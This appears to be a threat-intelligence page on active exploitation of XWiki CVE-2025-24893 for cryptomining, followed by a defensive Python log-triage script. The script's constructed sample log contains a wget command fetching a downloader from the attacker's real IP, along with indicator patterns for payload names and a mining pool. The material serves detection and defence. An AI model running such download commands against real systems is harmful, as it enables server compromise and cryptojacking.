XWiki eval injection actively exploited remote code execution flaw (CVE-2025-24893)
Vulnerability
Summary
The XWiki eval injection flaw CVE-2025-24893 is being actively exploited, putting exposed servers at risk of remote code execution via /bin/get/Main/SolrSearch. Attackers are chaining the bug into a two-stage workflow that drops a downloader and ultimately installs a cryptocurrency miner. VulnCheck said it observed exploitation attempts against XWiki canaries, and real-world abuse has been reported since March 2025. Users should apply updates as soon as possible to reduce exposure.
Cases
Related Happenings
TeamPCP Mini Shai-Hulud npm supply-chain campaign
Campaign
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **TeamPCP**-linked **Mini Shai-Hulud** campaign is a **malicious npm supply-chain operation** that steals developer credentials and abuses trusted publishing paths to spread t...
CPanel & WHM authentication-bypass exploitation wave (CVE-2026-41940)
Exploitation Wave
First: 04.05.2026 11:25
Last: 04.05.2026 11:25
Sources 1
About this happening:
Active exploitation of **CVE-2026-41940** is driving a **large cPanel & WHM compromise wave**, putting exposed servers at risk of administrative takeover. **More than 40,000 serve...
CISA Apache ActiveMQ CVE-2026-34197 mitigation order
Advisory/Mitigation
First: 21.04.2026 14:17
Last: 21.04.2026 14:17
Sources 1
About this happening:
**CISA** ordered **FCEB agencies** to secure **Apache ActiveMQ** servers by **April 30** after **CVE-2026-34197** was confirmed **actively exploited**. The flaw can allow **arbitr...
Oracle WebLogic Server CVE-2026-21962 rapid exploitation wave
Exploitation Wave
First: 26.03.2026 18:00
Last: 26.03.2026 18:00
Sources 1
About this happening:
**Oracle WebLogic Server** systems faced a rapid **CVE-2026-21962** exploitation wave after public exploit code appeared, creating immediate **RCE risk** for exposed servers. The...
HPE OneView RondoDox exploitation wave (CVE-2025-37164)
Exploitation Wave
First: 16.01.2026 11:15
Last: 16.01.2026 11:15
Sources 1
About this happening:
**RondoDox** has driven a **large-scale exploitation wave** against **HPE OneView** by targeting **CVE-2025-37164**, with activity escalating into **automated attacks** that creat...
Timeline
- 29.10.2025 09:44 · 3 articles · 7mo ago
VulnCheck reports active exploitation of XWiki CVE-2025-24893
Technical Analysis Update
VulnCheck said attackers are actively exploiting XWiki CVE-2025-24893, an eval injection flaw that can allow arbitrary remote code execution through a request to the "/bin/get/Main/SolrSearch" endpoint. The observed abuse targeted XWiki canaries from an attacker geolocated in Vietnam and used a two-stage workflow: wget retrieved the downloader "x640" from "193.32.208[.]24:8080" and wrote it to "/tmp/11909", then follow-on payloads "x521" and "x522" fetched a cryptocurrency miner, killed competing miners such as XMRig and Kinsing, and launched the miner with a c3pool.org configuration.
Sources
- Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack — thehackernews.com — 29.10.2025 09:44
- RondoDox botnet malware now hacks servers using XWiki flaw — www.bleepingcomputer.com — 18.11.2025 00:41
- XWiki Vulnerability Exploited in Cryptocurrency Mining Operation — www.securityweek.com — 29.10.2025 12:53
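
A triage sketch for defenders built only from the indicators in the timeline entry above. This is an added example, not code from VulnCheck or XWiki. The function names, the Combined Log Format assumption and every sample log line are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Indicators copied from the timeline entry; the defanged IP is re-fanged for matching.
ENDPOINT = "/bin/get/Main/SolrSearch"
HOST_IOCS = {
    "c2_ip": re.compile(r"(?<![\d.])" + re.escape("193.32.208[.]24".replace("[.]", ".")) + r"(?!\d)"),
    "drop_path": re.compile(r"/tmp/11909(?!\d)"),
    "payload_name": re.compile(r"(?<![\w.])x(?:640|521|522)(?!\w)"),
    "mining_pool": re.compile(r"c3pool\.org", re.I),
}
# Client, request target and status of a Combined Log Format line (assumed format).
REQ_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

def solrsearch_hits(access_lines):
    """Return (client, status) for every request that reached the SolrSearch endpoint."""
    hits = []
    for line in access_lines:
        m = REQ_RE.match(line)
        # Percent-decode the path and allow a servlet context prefix such as /xwiki.
        if m and unquote(urlsplit(m.group(2)).path).rstrip("/").endswith(ENDPOINT):
            hits.append((m.group(1), int(m.group(3))))
    return hits

def host_ioc_hits(lines):
    """Return (line_number, sorted indicator names) for host log lines matching any indicator."""
    out = []
    for n, line in enumerate(lines, 1):
        names = sorted(k for k, rx in HOST_IOCS.items() if rx.search(line))
        if names:
            out.append((n, names))
    return out

# Constructed sample data (documentation client IPs; not real telemetry).
ACCESS = [
    '198.51.100.7 - - [29/Oct/2025:09:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?CONSTRUCTED=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [29/Oct/2025:09:00:05 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 9001',
    '198.51.100.7 - - [29/Oct/2025:09:20:44 +0000] "GET /bin/get/Main%2FSolrSearch?CONSTRUCTED=1 HTTP/1.1" 200 498',
]
HOSTLOG = [
    'audit: exe=/usr/bin/wget args="http://193.32.208.24:8080/x640 -O /tmp/11909"',
    'audit: exe=/usr/bin/curl args="http://203.0.113.240/index.html"',
    'dns: query c3pool.org A',
    'kernel: segfault at 0x640 ip 00007f',
]
```

A request to the endpoint is not proof of exploitation on its own; correlate endpoint hits by time with host-side indicator hits before treating a server as compromised.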